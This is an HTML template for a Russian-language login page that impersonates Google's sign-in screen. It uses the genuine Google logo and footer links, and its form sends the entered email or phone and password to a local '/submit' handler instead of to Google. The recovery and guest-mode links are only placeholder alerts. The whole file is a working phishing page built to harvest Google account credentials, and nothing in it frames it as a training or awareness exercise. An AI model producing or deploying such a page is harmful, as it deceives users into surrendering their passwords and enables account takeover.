<!-- templates/index.html -->
<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Вход - Google</title>
    <link rel="stylesheet" href="/static/css/style.css">
    <script src="/static/js/script.js" defer></script>
</head>
<body>
    <div class="main-container">
        <div class="logo">
            <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google Logo" height="30">
        </div>
        <div class="login-box">
            <form action="/submit" method="POST">
                <div class="input-group">
                    <input type="text" name="username" placeholder="Телефон или адрес эл. почты" required>
                </div>
                <div class="input-group">
                    <input type="password" name="password" placeholder="Введите пароль" required>
                </div>
                <div class="button-group">
                    <button type="submit">Далее</button>
                </div>
            </form>
            <div class="links">
                <a href="https://accounts.google.com/signup" target="_blank">Создать аккаунт</a>
                <a href="javascript:void(0);" onclick="alert('Переход на страницу восстановления...')">Забыли пароль?</a>
            </div>
            <p>Не ваш компьютер? <a href="javascript:void(0);" onclick="alert('Гостевой режим включён')">Используйте гостевой режим</a> для повышения безопасности.</p>
            <p>Не вы компьютер? Включите гостевой режим, чтобы удалить данные после завершения работы.</p>
        </div>
        <div class="footer">
            <div class="footer-links">
                <a href="https://support.google.com/accounts" target="_blank">Справка</a>
                <a href="https://policies.google.com/privacy" target="_blank">Конфиденциальность</a>
                <a href="https://policies.google.com/terms" target="_blank">Условия</a>
            </div>
            <div class="language">
                <a href="javascript:void(0);">Русский</a> · <a href="javascript:void(0);">English</a> · <a href="javascript:void(0);">Українська</a>
            </div>
        </div>
    </div>
</body>
</html>